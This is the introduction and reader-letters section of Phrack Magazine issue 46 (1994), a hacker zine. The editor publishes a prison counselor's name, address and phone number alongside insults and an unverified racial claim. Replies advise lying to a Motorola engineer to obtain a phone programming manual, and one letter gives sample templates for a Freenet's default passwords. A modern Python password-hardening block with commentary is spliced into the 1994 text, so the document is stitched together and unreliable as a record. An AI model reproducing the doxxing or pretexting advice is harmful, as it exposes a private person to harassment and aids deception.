September 20, 1994


"La cotorra que chi, no canta" 


Honey, I’m home! Anyway, like the little proverb above indicates, I’ve
been a very busy man since the last issue. I’ve been denied entry to
a federal prison in North Carolina (imagine the irony of THAT); I’ve
been whoring in the Red-Light District of Amsterdam with military
intelligence officers from England, Spain and the US; estuve chicaito en
Nuevo Lardeo; I’ve tested wireless networks in Canada; and I’ve been
on TV a few more times. (No, nimrod, Phrack is not my job...I WORK
for a living.)


Needless to say, it has been a chore for me to get Phrack out at all,
much less only a month or so past my self-imposed quarterly deadline.
But hell, I love doing this magazine, so here it is. Phrack is the only
way I can completely thrill and simultaneously piss off so many people
at once, so I don’t think I’ll stop any time soon.


Pissing people off. It’s what I like to do, and it would appear that
I’m quite good at it. I realize that there are several extremely
vocal erikb-bashers out there. And to them I say, "smooches!"
Let’s face it, sour grapes make bad whiners. But hey, "As long as they’re
talking about Erikb, let ’em talk." (Sorry Mr. Ford)


Besides piecing together this issue, I’ve been working on getting
the WWW pages together. They still aren’t 100%, but they are getting
there. By the time I finally get them together, the Phrack
Web Site should be the ultimate underground resource on the net.
Check it out: http://freeside.com/phrack.html


You may be interested in the federal prison remark from the first 
paragraph. I had a meeting at IBM out in Research Triangle Park. I 
figured that this would be an ideal time to go see Co/Dec who still has 
several years of federal time left to serve. Co/Dec is in 
the Federal Correctional Institute at Butner, North Carolina, a short 
30 or so minutes from where I was staying in RTP. 


Anyway, I received the necessary forms from Co/Dec to get on the approved
visitors list, and sent them back in. After several weeks, Co/Dec said
that I still had not been added. My trip was slated for a week away, so
I called his counselor, Wilbert LeMay. Mr. LeMay told me that he never got
my forms. I then fed-ex’ed a copy (that I luckily had kept). It arrived
on Friday morning, and I was to arrive on Monday. Mr. LeMay had assured me
that it would be no problem to get me added to Co/Dec’s list.


When I arrived on Monday, I called the prison to make sure the visit had 
been cleared. Mr. LeMay would not return my calls. In fact, not only 
would he not return any of the 5 or so calls I made, but he didn’t even 
bother to enter my name on the visitor list until the Wednesday after I 
had already left North Carolina. 


I’m sorry, but this man must be a real prick. 


A bit of background on LeMay. First off, according to those on the inside, 
LeMay dislikes white people. He supposedly keeps a picture of slaves 
picking cotton on his desk as a constant reminder of the oppression his 
people were subjected to. But perhaps working in the prison system where 
you have constant view of the Aryan Brotherhood in action, I’m sure many
would begin to feel likewise. (Can’t we all just get along?) Secondly,
LeMay dislikes Co/Dec. He put Co/Dec in solitary confinement for weeks
because Co/Dec had a DOS MANUAL! A fucking DOS MANUAL! You do not
put someone in the fucking hole for brushing up on the syntax for xcopy!
You put them in the hole for inciting a fucking shank war, or for stealing 
food, or for punching a guard. Later, Co/Dec found himself in solitary 
confinement AGAIN because he traded some smokes for telephone parts he was 
going to use to fix a radio. The hole again. Not for weapons and drugs, 
NO! Much worse: wires and a speaker! 


The prison now considers Co/Dec a security risk, and reads all OUTGOING
mail he sends. Not just the regular reading of all incoming mail
that any inmate would expect. He can’t take any classes, he’s had
several more days added to his sentence for "bad time served,"
and in addition, all of his phone calls are live monitored and recorded.
(A funny note, during one conversation I found that my touchtones would
control the equipment they were using to record the call. The equipment
they were using was improperly connected and gave off a terrible hum
when activated. I kept turning off the recording, and the security
officer kept having to turn it back on.)


All of this, due to Counselor Wilbert LeMay. Thanks guy. 


If someone can so grossly abuse their power to completely remove the
dignity of another human being, inmate or otherwise, that person needs
to face severe disciplinary action. I’m writing the warden. Directory
Assistance says that Wilbert can be reached at:


Wilbert LeMay 
701 East E St. 
Butner, NC 27509 
919-575-6375 


Fun fact: Butner is serviced by GTE. 


You know, it’s pretty odd that as hackers, we probably know a larger number
of ex-cons and current inmates than most people. 


But anyway, on to Phrack.

This issue is pretty odd in that "The Man" has consented to write
a few syllables for us to distribute. Yes, Winn Schwartau submitted
his unique perspectives of Defcon and HOPE. It’s funny how many people
left Defcon this year and ran home to find information on HIRF weapons
after hearing Winn speak. (If you’ve actually built one by now, email
me.)


What else? GS1, Pagers, Voice Mail, VisaNet, Area 51, Programs,
Conferences, and an incomplete university dialup list. (Putting out
an incomplete list really irritates me, but hell, it’s taking a LOT
longer than I expected to get some 1300 dialups without more help.
AHEM!)


Can you dig it? I knew that you could. 


READ THE FOLLOWING 


IMPORTANT REGISTRATION INFORMATION 


Corporate/Institutional/Government: If you are a business,
institution or government agency, or otherwise employed by,
contracted to or providing any consultation relating to computers,
telecommunications or security of any kind to such an entity, this
information pertains to you.

You are instructed to read this agreement and comply with its
terms and immediately destroy any copies of this publication
existing in your possession (electronic or otherwise) until
such a time as you have fulfilled your registration requirements.
A form to request registration agreements is provided
at the end of this file. Cost is $100.00 US per user for
subscription registration. Cost of multi-user licenses will be
negotiated on a site-by-site basis.


Individual User: If you are an individual end user whose use
is not on behalf of a business, organization or government
agency, you may read and possess copies of Phrack Magazine
free of charge. You may also distribute this magazine freely
to any other such hobbyist or computer service provided for
similar hobbyists. If you are unsure of your qualifications
as an individual user, please contact us as we do not wish to
withhold Phrack from anyone whose occupations are not in conflict
with our readership.


Phrack Magazine corporate/institutional/government agreement 


Notice to users ("Company"): READ THE FOLLOWING LEGAL 
AGREEMENT. Company’s use and/or possession of this Magazine is 
conditioned upon compliance by company with the terms of this 
agreement. Any continued use or possession of this Magazine is 
conditioned upon payment by company of the negotiated fee 
specified in a letter of confirmation from Phrack Magazine. 


This magazine may not be distributed by Company to any 
outside corporation, organization or government agency. This 
agreement authorizes Company to use and possess the number of copies 
described in the confirmation letter from Phrack Magazine and for which 
Company has paid Phrack Magazine the negotiated agreement fee. If 
the confirmation letter from Phrack Magazine indicates that Company’s 
agreement is "Corporate-Wide", this agreement will be deemed to cover 
copies duplicated and distributed by Company for use by any additional 
employees of Company during the Term, at no additional charge. This 
agreement will remain in effect for one year from the date of the 
confirmation letter from Phrack Magazine authorizing such continued use 
or such other period as is stated in the confirmation letter (the "Term"). 
If Company does not obtain a confirmation letter and pay the applicable 
agreement fee, Company is in violation of applicable US Copyright laws. 


This Magazine is protected by United States copyright laws and 
international treaty provisions. Company acknowledges that no title to 
the intellectual property in the Magazine is transferred to Company. 
Company further acknowledges that full ownership rights to the Magazine 
will remain the exclusive property of Phrack Magazine and Company will 
not acquire any rights to the Magazine except as expressly set 
forth in this agreement. Company agrees that any copies of the 
Magazine made by Company will contain the same proprietary 
notices which appear in this document. 


In the event of invalidity of any provision of this agreement, 
the parties agree that such invalidity shall not affect the validity 
of the remaining portions of this agreement. 


In no event shall Phrack Magazine be liable for consequential, incidental
or indirect damages of any kind arising out of the delivery, performance or
use of the information contained within the copy of this magazine, even
if Phrack Magazine has been advised of the possibility of such damages.
In no event will Phrack Magazine’s liability for any claim, whether in
contract, tort, or any other theory of liability, exceed the agreement fee
paid by Company.


This Agreement will be governed by the laws of the State of Texas 
as they are applied to agreements to be entered into and to be performed
entirely within Texas. The United Nations Convention on Contracts for 
the International Sale of Goods is specifically disclaimed. 


This Agreement together with any Phrack Magazine 
confirmation letter constitute the entire agreement between
Company and Phrack Magazine which supersedes any prior agreement, 
including any prior agreement from Phrack Magazine, or understanding, 
whether written or oral, relating to the subject matter of this 
Agreement. The terms and conditions of this Agreement shall 
apply to all orders submitted to Phrack Magazine and shall supersede any 
different or additional terms on purchase orders from Company. 


REGISTRATION INFORMATION REQUEST FORM 


We have approximately users. 


Enclosed is $ 
We desire Phrack Magazine distributed by (Choose one): 
Electronic Mail: 


Hard Copy: 
Diskette: (Include size & computer format) 


Name: Dept: 


Company: 


Address: 


City/State/Province: 


Country/Postal Code: 


Telephone: Fax: 


Send to: 


Phrack Magazine 
603 W. 13th #1A-278 
Austin, TX 78701 


Enjoy the magazine. It is for and by the hacking community. Period. 


Editor-In-Chief : Erik Bloodaxe (aka Chris Goggans) 
3L33t : Ice-9 (for helping me get this done!) 
Rad Band : Green Day 


News : Datastream Cowboy 
Photography : The Man 
Prison Consultant : Co / Dec 


The Young Girl : Jane March 
Motor Trend’s Car 
of the Year : The 2600 Van 
Dickhead of the Month : Wilbert LeMay at FCI Butner 
Thanks To : Szechuan Death, Carl Corey, The Shining, Dcypher 
Hitman Italy, Herd Beast, Dr. Delam, Maldoror, 
The Red Skull, PsychoSpy, Seven Up, Erudite, Ice Jey 
Special Thanks To : Winn Schwartau


Phrack Magazine V. 5, #46, September 20, 1994. ISSN 1068-1035 
Contents Copyright (C) 1994 Phrack Magazine, all rights reserved. 
Nothing may be reproduced in whole or in part without written 
permission of the Editor-In-Chief. Phrack Magazine is made available 
quarterly to the amateur computer hobbyist free of charge. Any 
corporate, government, legal, or otherwise commercial usage or 
possession (electronic or otherwise) is strictly prohibited without 
prior registration, and is in violation of applicable US Copyright laws. 
To subscribe, send email to phrack@well.sf.ca.us and ask to be added to 
the list. 
603 W. 13th #1A-278 (Phrack Mailing Address)
Austin, TX 78701

freeside.com (Phrack FTP Site)
/pub/phrack

http://freeside.com/phrack.html (Phrack WWW Home Page)

phrack@well.sf.ca.us (Phrack E-mail Address)
or phrackmag on America Online


Submissions to the above email address may be encrypted
with the following key : (Not that we use PGP or encourage its
use or anything. Heavens no. That would be politically-incorrect.
Maybe someone else is decrypting our mail for us on another machine
that isn’t used for Phrack publication. Yeah, that’s it. :) )


** ENCRYPTED SUBSCRIPTION REQUESTS WILL BE IGNORED ** 


Phrack goes out plaintext...you certainly can subscribe in plaintext. 



-= Phrack 46 =- 

Table Of Contents 

1. Introduction by The Editor 17 K
2. Phrack Loopback / Editorial 52 K
3. Line Noise 61 K
4. Line Noise 56 K
5. Phrack Prophile on Minor Threat 12 K
6. Paid Advertisement 62 K
7. Paid Advertisement (cont) 45 K
8. The Wonderful World of Pagers by Erik Bloodaxe 24 K
9. Legal Info by Szechuan Death 13 K
10. A Guide to Porno Boxes by Carl Corey 13 K
11. Unix Hacking - Tools of the Trade by The Shining 42 K
12. The fingerd Trojan Horse by Hitman Italy 32 K
13. The Phrack University Dialup List 12 K
14. A Little About Dialcom by Herd Beast 29 K
15. VisaNet Operations Part I by Ice Jey 50 K
16. VisaNet Operations Part II by Ice Jey 44 K
17. Gettin’ Down ’N Dirty Wit Da GS/1 by Maldoror & Dr. Delam 25 K
18. Startalk by The Red Skull 21 K
19. Cyber Christ Meets Lady Luck Part I by Winn Schwartau 45 K
20. Cyber Christ Meets Lady Luck Part II by Winn Schwartau 42 K
21. The Groom Lake Desert Rat by PsychoSpy 44 K
22. HOPE by Erik Bloodaxe Diy -K
23. Cyber Christ Bites the Big Apple by Winn Schwartau 60 K
24. The ABCs of Better Hotel Staying by Seven Up 12 K
25. AT&T Definity System 75/85 by Erudite 13 K
26. Keytrap v1.0 Keyboard Key Logger by Dcypher 35 K
27. International Scenes by Various Sources 44 K
28. Phrack World News by Datastream Cowboy 38 K

Total: 996 K 


"Most hackers would have sold out their mother." 
Justin Tanner Peterson 


"Treason is loved of many but the traitor hated of all." 
Robert Greene (1552-1592) 


"They smile in your face, but all the while they want to take your place." 
The O’Jays

Phrack Loopback


I’d like to write you about my friends cat. His name is ’Cid. Cid
loves reading, in fact he’ll read just about anything, from the labels on
his cat food tins to the instructions on the "real" use of his Grafix
(incense burner :) ). Well one take, ’Cid (or was it me) was indulging
in the reason he got his moniker and mentioned that he’d like to receive
Phrack. Well i told him he could just subscribe to it and then he went
into a real sob story about how he doesn’t have net access. So as a
favor to ’Cid (who really does exist, and really has tripped out on brain
blotters) i’d like to subscribe to Phrack.


[You may want to take note that Phrack can also be printed on paper.
Now, that’s a lot of blotter.


You’ve got your subscription, now go watch some anime.]


I recently got a new job and shortly after beginning working there, they 
decided to retool and reorganize a bit for better productivity. 


While we were going through some old boxes and stuff, I came across a 
little black box with the words "Demon Dialer" molded into the front of 
it, it even had the (functional!) 20volt power supply. 


Needless to say I was pretty happy with my find. I asked if I could have
it and since no one else there seemed to know what to make of it, mine it
was!

My only problem now... I’ve played around with it, and it seems to do a
lot more than what I originally thought, but the fact of the matter is..
I really haven’t the foggiest idea of how to get it to REALLY work for me.


If anyone has any information, or better still, actual documentation for
a Telephonics Inc, Demon Dialer... I’d really appreciate passing it on to me.

Also, something rather strange. The phone cable attached to it had a
normal looking 4-wire connector on one end, but the other was split to
have RJ jacks, one with the yellow-black combo and one with the
red-green. The split ends (sorry :)) were plugged into the WALL and
PHONE jacks on the demon dialer. The purpose for this perplexes me since
one’s supposed to be input and one’s supposed to be a passthrough for the
phone to be plugged into.


Anyway, any info would be nice. Thanks guys. 


[Telephonics was one of those odd telco device manufacturers back in the
80’s. They made the demon dialer (a speed dialing device), a
two-line conference box, a divertor, etc. Essentially, they provided
in hardware what the telco’s were beginning to roll-out in software.


I think the line splitter you have was merely plugged into those
two jacks for storage purposes. What that probably was for was to
allow two lines to use the Demon Dialer. It was probably just reversed
when your company boxed it so it wouldn’t get lost.


I’m not sure if Telephonics is still in business. A good place to
start looking for info would be comp.dcom.telecom or alt.dcom.telecom.
Another good place may be Hello Direct (800-HI-HELLO). They used to
have Telephonics equipment available for mail-order.]


I saw an ad for a book called "Secrets of a SuperHacker" by Knightmare. 
Supposedly it intersperses tales of his exploits with code and examples. 
I have big doubts, but have you heard anything good/bad about it? 


[Your doubts are well founded. I got an advance copy of that book. 
Let’s put it this way: does any book that contains over a dozen pages 
of "common passwords" sound like ground breaking material? 


This book is so like "Out of the Inner Circle" that I almost wanted
to believe Knightmare (Dennis Fiery) was really yet another
alias for Bill Landreth. Imagine "Out of the Inner Circle" with
about a hundred or more extra pages of adjectives and examples that
may have been useful years back.


The Knightmare I knew, Tom in 602, whose bust by Gail Thackeray
gave law enforcement a big buffer of the Black Ice Private BBS
and help spark the infamous LOD Hacker Crackdown, certainly didn’t
have anything to do with this. In fact, the book has a kind of
snide tone to it and is so clueless, that leads me to believe it
may have been written by a cop or security type person looking to
make a quick buck.


As far as source code, well, there is a sample basic program that 
tries to emulate a university login. 


If you want a good book, go buy "Firewalls and Internet Security" by 
Cheswick and Bellovin.] 


Hey Chris, 


I’m sure you are under a constant avalanche of requests for certain files,
so I might as well add to your frustration <grin>. I know of a program
that supposedly tracks cellular phone frequencies and displays them on
a cellmap. However, I don’t know the name of the program or (obviously)
where to find this little gem. I was wondering if you could possibly
enlighten me on a way to acquire a program similar to the one I have
described. I have developed some other methods of tracking locations
of cellular calls. However my methods rely on a database and manually
mapping cellular phones, this method is strictly low tech. Of course
this would be for experimental use only, therefore it would not be used
to actually track actual, restricted, radio spectrum signals. I wouldn’t
want the aether Gestapo pummeling our heads and necks.


[I don’t know of anything that plots frequencies on a cellmap. How would 
you know the actual locations of cells for whatever city you may 
be in to plot them accurately? 


There are a number of programs written to listen to forward channel messages
and tell you when a call is going to jump to another channel. The cellular
telephone experimenter’s kit from Network Wizards has a lot of nice
C source that will let you write your own programs that work with their
interface to the OKI 900. I suppose you could get the FCC database
CD-ROM for your state and make note of longitude and latitude of cell sites
and make your own database for your city, and then make a truly
visual representation of a cellmap and watch calls move from cell to cell.
But I don’t think there is such a thing floating around the underground
at present.


Of course the carriers have this ability, and are more than happy to make
it available to Law Enforcement (without a warrant mind you). Hi OJ!

email Mark Lottor mw@nw.com for more info about the CT

I saw this in a HoHoCon ad: 


Top Ten Nark List

1. Traxxter
2. Scott Chasin
3. Chris Goggans
4. Aget Steal
5. Dale Drrew
6. Cliff Stoll
7. [blank]
8. Julio Fernandez
9. Scanman
10. Cori Braun


What did Chris Goggans do? Isn’t he Erik Bloodaxe, the publisher of
Phrack? I sincerely doubt that the feds would have someone
working for them that puts out a publication like Phrack. It would
be way too much of an embarrassment for them. I wrote to the
editor of Phrack when I read that Agent Steal said that the publisher
of Phrack was a Fed -- IN PHRACK no less. He said it was a stupid rumor.


Is there anything to support this fact? And why is there now some manhunt for
Agent Steal (at CFP the FBI was checking legs) if Steal was admittedly
their employee? The whole thing is very confusing to me. Please explain.

If Goggans isn’t Bloodaxe then he’s Knight Lightning (this just came to me).
Nevertheless, what’s the story here?


[First off, I think you take things a little too seriously. If you are on
a nark hunt, worry about your associates, not people you obviously
don’t even know. Chris Goggans (ME) is most positively Erik Bloodaxe.
Thanks for remembering.


Agent Steal was involved with the FBI. This is a fact.
In his case, he even appeared to have some kind of immunity while trying
to gather information on other hackers like Mitnik and Poulsen. This
immunity is under scrutiny by the Bureau’s own Internal Affairs (or so the
new rumors go), since Steal was pulling a fast one and committing crimes
the Bureau didn’t know about to get some quick cash while he set up his
friends.


My story is a bit more convoluted. You can sum it up by saying, if you
interfere with my businesses, I’ll try my best to track you down and turn
you in. I guess I am a nark.]


I read in the last Phrack (45) that you wanted someone to write a few
words on scrambling systems. Give me a rough outline of what you want
and I’ll see if I can help :-) Basically I wrote the Black Book
(European Scrambling Systems 1,2,3,4,5 and World Satellite TV &
Scrambling Methods) and also edit Hack Watch News & Syndicated
HackWatch. They all deal with scrambling system hacks as opposed to
computer hacking & phreaking. (Things are a bit iffy here as regards
phreaking as all calls are logged but the eprom phone cards are easy
to hack) Oh yeah and another claim to fame ;-) if you can call it
that, is that I was quoted in an article on satellite piracy in
"Wired" August issue.


This Hawkwind character that you had an article from in Phrack43
sounds like a *real* hacker indeed :-> Actually there is an elite in
Ireland but it is mainly concerned with satellite hacking and that
Hawkwind character is obviously just a JAFA (Irish hacker expression
-- Just Another Fu**ing Amateur). Most of the advanced telco stuff is
tested in the south of the country as Dublin is not really that
important in terms of comms - most of the Atlantic path satellite
comms gear and brains are on the south coast :-)


Actually the Hawkwind article really pissed off some people here in
Ireland there were a few questions asked on my own bbs (Special
Projects +353-51-50143) about this character. I am not even sure if
the character is a real hacker or just a wannabe there were no
responses from any of his addresses. SP is sort of like the neutral
territory for satellite and cable hacking information in Europe
though there are a few US callers. With the way things are going with
your new DBS DirecTv system in the US, it looks like the European
satellite hackers are going to be supplying a lot of information
(DirecTv’s security overlay was developed by News Datacom - the
developers of the totally hacked VideoCrypt system here in Europe).


The telco here uses eprom phone cards. These are extremely easy to
hack (well most real hackers in .IE work on breaking satellite
scrambling systems that use smart cards) as they are only serial
eprom.


Regards 


[About the satellite information: YES! Write the biggest, best
article the whole fucking hacker world has ever seen about
every aspect of satellite tv!! Personally, I’m more interested in
that than anything else anyone could possibly write (seeing as how
I’m about to buy a dish for both C and Ku).


About Hawkwind’s article on hacking in Ireland: If I were to write
an article about hacking in America, it would be entirely different
than anyone else in America would write. A country is a big place.
Just because someone else’s hacking experience is different than
your own, it’s no reason to discredit them. However, if your
exposure to the scene in Ireland is so completely different than
Hawkwind’s, I would LOVE to print it as well.]




The Columbus Freenet uses a password generating routine that takes the
first and last initial of the user’s real name, and inserts it into a randomly
chosen template. Some of the templates are:

E (f) www5 (l)
(f) 22ww5 (l)     where f and l are first and last initials
(f) 2ww97 (l)
(f) 2ww95 (l)

and so on. There are not too many of these templates, I guess maybe 50.


I imagine most people go in and change their password right away, but 
then again that’s what a prudent person would do (so they probably don’t). 


Columbus 2600 meetings: 


Fungal Mutoid-sysop of The KrackBaby BBS (614-326-3933) organized the 
first 2600 meetings in Columbus, unfortunately hardly anyone shows up... 
I don’t know why HP is so dead in Central Ohio, but fear and paranoia 
run rampant. 

That’s all for now...keep up with the good work! 


R.U.Serius?! 


[Hmmm...templates are always a bad thing. All one has to do is get the
program that generates them, and voila, you’ve got a pre-made dict file
for your crack program. Not very smart on the part of the Freenet,
but hacking a Freenet, is like kicking a puppy.


I hope more people go to your 2600 meetings. The ones here in Austin 
kinda died out too. Maybe our cities are just lame.] 
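
The weakness discussed in the letter and reply above, as an added example (not from the letter, the reply, or the Freenet's own software): it measures how little entropy an initials-plus-template password carries, shows a check an administrator could run at password-change time to refuse anything the scheme could have issued, and gives a CSPRNG-based replacement generator. The three template strings are taken from the letter with their middle characters assumed to be literals, the count of 50 is the letter writer's guess, and all function names are hypothetical.

```python
import math
import secrets
import string

# Three of the template shapes printed in the letter. Treating the middle
# characters as fixed literals is an assumption made for this example.
SAMPLE_TEMPLATES = ["{f}22ww5{l}", "{f}2ww97{l}", "{f}2ww95{l}"]
ESTIMATED_TEMPLATE_COUNT = 50  # the letter writer's own guess


def template_keyspace(template_count, name_known):
    """Number of distinct passwords the template scheme can produce.

    If the user's real name is known, the initials add nothing and only
    the template choice is secret; otherwise there are 26 x 26 initials.
    """
    initials = 1 if name_known else 26 * 26
    return template_count * initials


def entropy_bits(keyspace):
    """Bits of entropy for a uniform choice among `keyspace` values."""
    return math.log2(keyspace)


def is_template_default(password, first_name, last_name,
                        templates=SAMPLE_TEMPLATES):
    """True if `password` is one the scheme would issue to this user."""
    if not first_name or not last_name:
        return False
    first, last = first_name[0].lower(), last_name[0].lower()
    issued = {t.format(f=first, l=last) for t in templates}
    return password.lower() in issued


def accept_new_password(password, first_name, last_name):
    """Password-change check: refuse anything the old scheme could issue."""
    return not is_template_default(password, first_name, last_name)


def random_password(length=12):
    """Replacement generator: every character drawn from the OS CSPRNG."""
    alphabet = string.ascii_letters + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(length))


if __name__ == "__main__":
    known = template_keyspace(ESTIMATED_TEMPLATE_COUNT, name_known=True)
    unknown = template_keyspace(ESTIMATED_TEMPLATE_COUNT, name_known=False)
    print(f"name known:   {known} candidates, {entropy_bits(known):.1f} bits")
    print(f"name unknown: {unknown} candidates, {entropy_bits(unknown):.1f} bits")
    print(f"12 random alphanumerics: {entropy_bits(62 ** 12):.1f} bits")
    # Constructed sample account, not a real user.
    print("accept 'j2ww97s' for Jane Smith?",
          accept_new_password("j2ww97s", "Jane", "Smith"))
    print("example strong password:", random_password())
```
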


A complaint: That piece about McDonald’s in Phrack 45 was, in a word, LAME.
Surely Phrack can do better. Maliciousness for its own sake isn’t very
interesting and frankly the article didn’t have any ideas that a bored
13-year-old couldn’t have thought up--probably written by one.


That aside, I found some good stuff in there. Some of it was old news,
but Phrack serves an archival purpose too, so that was ok. On a more
personal note, I could really relate to your account of HoHoCon--not that
I was there, just that I have started to feel old lately even though I don’t
turn 25 for another 2 days :) Sometimes I feel myself saying things like
"Why, sonny, when I was your age the Apple II was king..."


Keep up the good work, and don’t let the lamers get you down. 


[Thanks for the letter. I personally thought the McDonald’s file was
a laugh riot. Even if it was juvenile and moronic, I wouldn’t expect
anyone to analyze it and go through with anything it contained. It was
just for fun. Lighten up :)


I am glad to see that at least someone else recognizes that Phrack
is attempting to serve as an archive of our subculture, rather than just
a collection of technical info that will be outdated overnight, or a
buglist that will be rendered mostly unusable within hours of release.
There is so much going on within the community, and it is becoming such a
spectacle in the popular media, that in 20 years, we can all go back and
look at Phrack and remember the people, places, and meetings that
changed the face of the net.


Or maybe I’m just terribly lame, and either 1) refuse to put in the
good stuff, 2) don’t have access to the good stuff, 3) exist only as a
puppet agent of The Man, or 4) Don’t know nothin’ ’bout Telco!

But you know what they say about opinions.]




I have a few comments on your editorial in Phrack 44 (on information 
wants to be free). Thanks for voicing an opinion that is shared by many 
of us. I am glad to see a public figure in the CuG with nutz enuff to 
actually come out and make such a statement and mean it. 

Again, thanks. 


Now on the subject of hacking as a whole. Is it just me, or are the number
of losers on the increase? There have always been those who would try
and apply these skills to ripoff scams and system trashing but now that
seems to be the sole intent of many of the "hackers" I come into contact
with. What ever happened to hacking to learn more about the system. To
really hack a system (be it phone, computer), is a test of skill and
determination, and upon success you walk away with a greater understanding
of the machine and its software. Hacking is more than just knowing how
to run crack on a filched password file, or using some exploitation
scripts picked up on IRC, it is a quest for knowledge and gaining
superiority over a system by use of great skill acquired by a deliberate
effort. Once was a time when things like toll fraud (I do miss blue
boxes) were a means to an end, now they seem to be the end in itself.

Also, I am researching info on OSI comsec procedures and have found some 
really interesting goodies, if you are interested in publishing 
my piece when completed, let me know.. 


[ (NOTE: This came from a .mil) 
Man, I’m glad to see that people in the armed forces still have minds 
of their own. Not many people would express such a thing openly. 


Yes, the destructive/profit-motivated trends of many of the hackers of
today are pretty sad. But you have to realize, as the technology
becomes more and more like consumer electronics, rather than the
traditional mold of computer as scientific research tool, an entirely
different market segment will be exposed to it and use the technology
for less than scrupulous means.


Even the act of hacking itself. Today, I can basically gain access
to any model of system known to man by asking. I realize that
there are many who cannot accomplish such a thing, but with the
proliferation of public access sites, almost everyone can afford
access to the net to explore and learn. The point comes down to this:
if you have an account on a Sun, why do you need an account on a Sun
at Boeing, unless you either 1) want to sell the cad files of the 777 to
Airbus or McDonnell-Douglas 2) want to get financial information to
make a killing on Wall Street, or 3) just want to have an ego boost
and say "I OWN BOEING!"


Personally, I can understand the ego boost aspect, but I’ve decided that
I’d much rather get paid by a company like Boeing to hack for them
than against them. I don’t want to sell anyone’s info, so hacking
into any company is basically useless to me, unless they are paying me
to look for potential weaknesses.


Granted, it’s not an easy market to get into, but it’s a goal to 
shoot for. 


And for those who find it impossible to quit due to fear of losing 
their edge, check out my editorial in this issue for a possible 
solution. ] 


I am looking for a Macintosh app that does the same thing as an app
called "Demon Dial" that has been lost in the annals of software
history due to the fact that some people (sysops) question whether it
is illegal software (it dials up a series of phone #’s looking for data
connections). Do you know where I could find an application for the Mac
that does this simple function?


[We had a guy ask in an earlier issue for Macintosh hacking/phreaking
apps. No one responded. Hell, I know SOMEONE has to use a Mac
out there. Are you Mac-weenies all embarrassed to speak up?


Hell, uuencode and email me your apps, and I’ll put them up for
ftp! Help out your poor fellow Macintosh users. I certainly
would if I could, but the thought of touching a Mac gives me the
chills.]


Have you ever heard of being denied access to your own cell phone?
I am currently in the process of buying a cell phone and was informed
that I COULD NOT have the programming guide of the security code
they enter to program my phone. In my opinion the key word is "MY."


If I get a digital security system for my house you better damn well
figure I will have the security codes for that. The phone was a Motorola
flip phone. I called Motorola and explained how displeased I was with
this company and they said they could not interfere with a reps. policy.


When I was selling car phones we kept the programming guide unless they
asked for it. I demanded it and they laughed in my face. Who said
"the customer is always right" anyway?


Thanks, any info is greatly appreciated. By the way, you wouldn’t
happen to have the CN/A number for 815 would you? Also, any ANAC
would be very helpful.


[Well, I hate to say it, but you got typical service from your
cellular agent. Let’s face it, these sales reps probably knew
about as much about that programming manual as I do nuclear
physics: "It’s confusing, but if you understand it, you can fuck
things up."


I am surprised that Motorola wouldn’t sell you the book though.
Motorola will sell anybody anything. You probably called the wrong
place. Moto is so huge they’ve got multiple groups working on somewhat
similar technologies with absolutely no communication between the groups.
Sometimes they are in different countries, but sometimes they are in the
same city! I would suggest you call a local FAE (Field Applications
Engineer) and get them to get the book for you. Make up some story about
working on some computer controlled application with the phone, and that
you need any and all documentation on the phone. They’ll do it. Money
is money.


As far as the 815 CNA, hell, just call the business office. I haven’t
called a CNA in years, only the business office. They are nice people.
And no PINs.


815 ANAC: ok guys, someone must have one...email it!


"The customer is always right" wasn’t in Bartlett’s or Columbia’s
books of famous quotations. I guess that phrase has been written out of our
history. So, from now on you aren’t always right, I guess. ]


Dear Phrack: 


We want you! 


We want you to be a part of our cutting edge documentary that is traversing
across the "NEW EDGE" of computers, culture, and chaos.


Working in conjunction with Douglas Rushkoff, the best selling author of
"CYBERIA," we are currently gathering together the leaders of this
technological and cultural revolution. This is not a documentary in the
traditional sense of the word. It is more of an exploration, a journey, a
unique vision of the world as seen through the eyes of those who live on the
bleeding edge; where technology, art, science, music, pleasure, and new
thoughts collide. A place people like you and me like to call home.


"New Edge" will deliver a slice of creativity, insanity, and infallibility,
and feed those who are hungry for more than what Main Street USA has to
offer. This project will detonate across the US and around the world. It
will become the who’s who of the new frontier and you belong on its
illustrious list of futurians. Please look over the enclosed press release
description of the project.


Phrack has long been the ultimate source for hack/phreak info, and helped to 
push the limits of free speech and information. The role that Phrack has 
played in the Steve Jackson Games Case set an important precedent for 
CyberLaw. We will also be interviewing several people from the EFF. 


Please call me ASAP to schedule an interview for "New Edge", or send me 
E-Mail. 


Sincerely, 


Todd LeValley 

Producer, N E W EDGE 
(310) 545-8138 Tel/Fax 
belief@eworld.com 
Labyrinth Media Ltd. - European reality-based documentary distributor


The Audience 


New Edge is aimed at both the technophiles and technophobes alike. While the
show will feature very complex and sophisticated topics, the discussions will
be structured to appeal to both those who do and do not have the technical
framework that underlines the cyberian movement. The show’s content and
style will make it readily available to the MTV and Generation X demographic
groups as well as executives who want to stay on top of the latest
technological advances. Individuals who read Mondo 2000 and Wired magazine
will also naturally latch on to this electronic
presentation of their favorite topics.


The Guides 


Mike Goedeck - Director/Graphic Designer
Mike was the Writer/Director/Cinematographer for the Interplay CD-ROM game
entitled Sim City. Acting as graphic designer for the Voyager Co.- Criterion 
Laser Disc Division his work is featured on titles such as: Akira, DEVO-The 
Truth About De-Evolution, The Adventures of Baron Munchausen, and Spartacus. 
Most recently he collaborated with Los Angeles Video Artist Art Nomura on a 
video installation piece entitled Digital Mandala. The piece was edited, 
composited, and mastered to Laser Disc using an Apple Macintosh Computer and
off-the-shelf software. The installation is scheduled to tour museums and 
art galleries across the United States and Europe. While attending 
Cinema/Television Graduate School at the University of Southern California, 
Mike directed the award winning documentary short Rhythm, which celebrates 
various musical cultures. 


Todd LeValley - Producer/Graphic Designer
Todd is the Producer/Director of CyberCulture: Visions From The New Edge, a 
documentary that introduces the electronic underground. This project has 
been warmly received at numerous "Cyber Festivals" around the country, as 
well as at the Director’s Guild Of America, and is currently being 
distributed by FringeWare Inc. Todd’s commercial experience includes being 
the in-house graphic designer for Barbour/Langley Productions designing, 
compositing, and producing the graphic packages for several 20th Century Fox 
Television pilots and The Sci-Fi Trader for the USA Network/Sci-Fi Channel. 
Todd is a graduate of the Cinema/Television program at Loyola Marymount 
University. 


Jeff Runyan - Cinematographer/Editor 
Jeff received an MFA from the University of Southern California’s Graduate 
School of Cinema/Television with an emphasis in cinematography and editing. 
He studied cinematography under the guidance of Woody Omens, ASC. and Earl 
Rath, ASC., and editing with Edward Dmytryk. Jeff was the cinematographer on 
the award winning documentary Rhythm. He has recently completed shooting and
editing a documentary on Academy Award winning Cinematographer Conrad Hall 
